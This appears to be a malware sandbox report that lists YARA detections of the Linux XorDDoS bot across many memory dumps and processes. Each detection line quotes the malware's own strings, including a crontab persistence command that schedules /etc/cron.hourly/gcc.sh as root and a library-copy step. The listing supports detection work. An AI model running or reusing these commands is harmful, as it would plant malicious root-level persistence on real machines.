10450.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10065.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10065.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10219.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10219.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9579.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9579.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9722.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9722.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10076.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10076.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10175.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10175.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9601.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9601.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9590.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9590.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10439.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10439.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9788.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9788.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10109.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10109.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9843.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9843.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10351.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10351.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9766.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9766.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10340.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10340.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9953.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9953.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10274.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10274.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10021.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10021.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10087.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10087.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9931.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9931.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9667.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9667.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10285.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10285.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9744.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9744.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10164.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10164.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9898.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9898.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9457.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9457.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9634.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9634.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10252.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10252.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9832.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9832.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10362.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10362.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10131.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10131.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9876.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9876.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
Process Memory Space: dkuidbsedp PID: 9445	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9450	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9453	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9457	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9546	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9557	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9568	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9579	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9590	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9601	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9612	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9623	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9634	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9644	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9656	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9667	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9678	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9689	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9700	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9711	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9722	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9733	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9744	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9755	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9766	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9777	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9788	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9799	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9810	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9821	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9832	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9843	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9854	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9865	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9876	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9887	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9898	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9909	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9920	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9931	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9942	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
